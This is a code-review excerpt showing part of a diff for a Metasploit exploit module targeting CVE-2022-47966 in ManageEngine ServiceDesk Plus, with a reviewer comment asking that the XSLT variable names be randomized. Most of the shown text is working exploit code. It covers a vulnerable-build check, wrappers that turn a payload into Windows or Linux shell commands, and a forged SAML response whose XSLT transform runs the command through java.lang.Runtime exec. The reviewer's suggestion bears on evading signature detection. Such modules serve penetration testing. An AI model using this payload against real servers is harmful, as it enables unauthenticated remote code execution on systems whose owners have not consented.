modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb

```diff
@@ -0,0 +1,216 @@
+      return CheckCode::Safe("This is not ManageEngine ServiceDesk Plus (#{info[:product]})")
+    end
+    unless Rex::Version.new(info[:build]) <= Rex::Version.new('14003')
+      return CheckCode::Safe("Target build is #{info[:build]}")
+    end
+
+    CheckCode::Appears
+  end
+
+  def encode_begin(real_payload, reqs)
+    super
+
+    reqs['EncapsulationRoutine'] = proc do |_reqs, raw|
+      raw.start_with?('powershell') ? raw.gsub('$', '`$') : raw
+    end
+  end
+
+  def exploit
+    case target['Type']
+    when :windows_command, :unix_cmd
+      execute_command(payload.encoded)
+    when :windows_dropper, :linux_dropper
+      execute_cmdstager(delay: datastore['DELAY'])
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    case target['Type']
+    when :windows_dropper
+      cmd = "cmd /c #{cmd}"
+    when :unix_cmd, :linux_dropper
+      cmd = cmd.gsub(' ') { '${IFS}' } if target['Type'] == :linux_dropper
+      cmd = "bash -c #{cmd}"
+    end
+    cmd = cmd.encode(xml: :attr).gsub('"', '')
+
+    saml = <<~EOS
+      <?xml version="1.0" encoding="UTF-8"?>
+      <samlp:Response
+        ID="_eddc1e5f-8c87-4e55-8309-c6d69d6c2adf"
+        InResponseTo="_4b05e414c4f37e41789b6ef1bdaaa9ff"
+        IssueInstant="2023-01-16T13:56:46.514Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
+        <samlp:Status>
+          <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
+        </samlp:Status>
+        <Assertion ID="_b5a2e9aa-8955-4ac6-94f5-334047882600"
+          IssueInstant="2023-01-16T13:56:46.498Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
+          <Issuer>#{Rex::Text.rand_text_alphanumeric(3..10)}</Issuer>
+          <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+            <ds:SignedInfo>
+              <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+              <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
+              <ds:Reference URI="#_b5a2e9aa-8955-4ac6-94f5-334047882600">
+                <ds:Transforms>
+                  <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+                  <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
+                    <xsl:stylesheet version="1.0"
+                      xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
+                      xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+                      <xsl:template match="/">
+                        <xsl:variable name="rtobject" select="rt:getRuntime()"/>
+                        <xsl:variable name="process" select="rt:exec($rtobject,'#{cmd}')"/>
+                        <xsl:variable name="processString" select="ob:toString($process)"/>
+                        <xsl:value-of select="$processString"/>
```

Comment:
It looks like these variable names can be randomized? `rtobject`, `process`, `processString`.